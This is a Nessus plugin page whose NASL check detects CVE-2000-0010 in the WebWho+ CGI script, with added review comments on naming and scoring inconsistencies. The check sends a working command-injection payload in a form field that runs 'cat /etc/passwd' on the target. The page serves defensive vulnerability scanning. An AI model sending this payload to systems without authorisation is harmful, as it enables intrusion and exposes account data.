nessus
This script is Copyright (C) 2003-2021 and is owned by Tenable, Inc. or an Affiliate thereof.
WEBWHO_PL.NASL
History: Mar 09, 2003 - 12:00 a.m.

WebWho+ whois.pl time Parameter Arbitrary Command Execution

2003-03-09 00:00:00
This script is Copyright (C) 2003-2021 and is owned by Tenable, Inc. or an Affiliate thereof.
www.tenable.com
23

CVSS2

10

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

COMPLETE

Integrity Impact

COMPLETE

Availability Impact

COMPLETE

AV:N/AC:L/Au:N/C:C/I:C/A:C

EPSS

0.06

Percentile

93.5%

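The WebWho+ CGI script appears to be installed on the remote host. This Perl script allows an attacker to view any file on the remote host as well as to execute arbitrary commands, both subject to the privileges of the web server user id.

Note: the plugin source below requests `webwho.pl` rather than the `whois.pl` named in the title, and its embedded CVSS2 base vector (AV:N/AC:L/Au:N/C:P/I:P/A:P) differs from the AV:N/AC:L/Au:N/C:C/I:C/A:C vector shown on this page. Triage on the finding itself (command execution as the web server user) rather than on either score alone.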

#%NASL_MIN_LEVEL 70300
#
# (C) Tenable Network Security, Inc.
#



include('deprecated_nasl_level.inc');
include('compat.inc');

if (description)
{
  # Registration pass: declares the plugin's identity, report text and
  # scheduling constraints, then exits without touching the target.

  # --- Identity and external references ---
  script_id(11333);
  script_version("1.21");
  script_cve_id("CVE-2000-0010");
  script_bugtraq_id(892);

  # NOTE(review): the name refers to whois.pl and a "time" parameter, while
  # the check in this file requests webwho.pl and places its probe in the
  # "type" form field - confirm which naming is intended.
  script_name(english:"WebWho+ whois.pl time Parameter Arbitrary Command Execution");

  # --- Report text shown to the operator ---
  script_set_attribute(attribute:"synopsis", value:
"The remote web server contains a CGI script that is prone to arbitrary
code execution.");
  script_set_attribute(attribute:"description", value:
"The WebWho+ CGI script appears to be installed on the remote host. 
This Perl script allows an attacker to view any file on the remote host
as well as to execute arbitrary commands, both subject to the privileges
of the web server user id.");
  script_set_attribute(attribute:"see_also", value:"https://seclists.org/bugtraq/1999/Dec/322");
  script_set_attribute(attribute:"solution", value:
"Remove the affected script.");

  # --- Risk scoring ---
  # The base vector rates confidentiality, integrity and availability as
  # partial (C:P/I:P/A:P).
  # NOTE(review): the description above states arbitrary command execution;
  # confirm the partial ratings are the intended score for this finding.
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P");
  # NOTE(review): the temporal vector carries E:POC while "exploit_available"
  # below is "false" - confirm the two are meant to disagree.
  script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
  script_set_attribute(attribute:"exploitability_ease", value:"No exploit is required");
  script_set_attribute(attribute:"exploit_available", value:"false");

  # --- Dates and plugin type ---
  script_set_attribute(attribute:"plugin_publication_date", value:"2003/03/09");
  script_set_attribute(attribute:"vuln_publication_date", value:"1999/12/26");
  script_set_attribute(attribute:"plugin_modification_date", value:"2021/01/19");
  script_set_attribute(attribute:"plugin_type", value:"remote");
  script_end_attributes();

  # --- Scheduling ---
  script_summary(english:"Checks if webwho.pl is vulnerable");
  # NOTE(review): the check in this file makes the target run a shell
  # command and return /etc/passwd. Scan policies use the category to decide
  # what runs, so confirm that ACT_GATHER_INFO (rather than ACT_ATTACK) is
  # the intended classification for an active probe of this kind.
  script_category(ACT_GATHER_INFO);
  script_copyright(english:"This script is Copyright (C) 2003-2021 and is owned by Tenable, Inc. or an Affiliate thereof.");
  script_family(english:"CGI abuses");
  script_dependencie("http_version.nasl");
  script_require_ports("Services/www", 80);
  # Not scheduled when the scan has CGI scanning disabled.
  script_exclude_keys("Settings/disable_cgi_scanning");
  exit(0);
}

#
# The script code starts here
#

include("global_settings.inc");
include("misc_func.inc");
include("http.inc");
include("data_protection.inc");

# Active check. For every candidate CGI directory: confirm webwho.pl is
# present, POST the probe body to it, and report the host as vulnerable if
# the response contains a passwd-style entry for root.
#
# Operators should treat this as an intrusive probe: a vulnerable target runs
# the embedded command. On the target side it appears in web logs as a POST
# to webwho.pl whose body contains shell metacharacters.
port = get_http_port(default:80);

# Probe body, reproduced exactly as shipped. The "echo foo" markers bracket
# the file contents in the response.
# NOTE(review): the body is sent without URL-encoding and no content type is
# passed to http_send_recv3 below - confirm the library labels the body as
# form data, otherwise the CGI may not parse it and a vulnerable install
# could be missed.
probe_body = 'command=X&type="echo foo;cat /etc/passwd;echo foo&Check=X';

foreach dir (cgi_dirs())
{
  url = dir + "/webwho.pl";

  # Skip directories that do not hold the script at all.
  if (!is_cgi_installed3(item:url, port:port)) continue;

  res = http_send_recv3(method:'POST', item:url, port:port, data:probe_body);

  # A null response ends the whole plugin, not only this directory.
  if (isnull(res)) exit(0);

  # res[2] is matched for a root account line with UID 0 and GID 0 or 1.
  if (!egrep(pattern:".*root:.*:0:[01]:.*", string:res[2])) continue;

  # Redact the captured passwd content before it can reach the report, so
  # scan results do not carry the target's account data.
  res[2] = data_protection::redact_etc_passwd(output:res[2]);

  if (report_verbosity > 0)
    security_hole(port:port, extra:res[2]);
  else
    security_hole(port:port);

  # One confirmed hit is enough; stop probing further directories.
  exit(0);
}
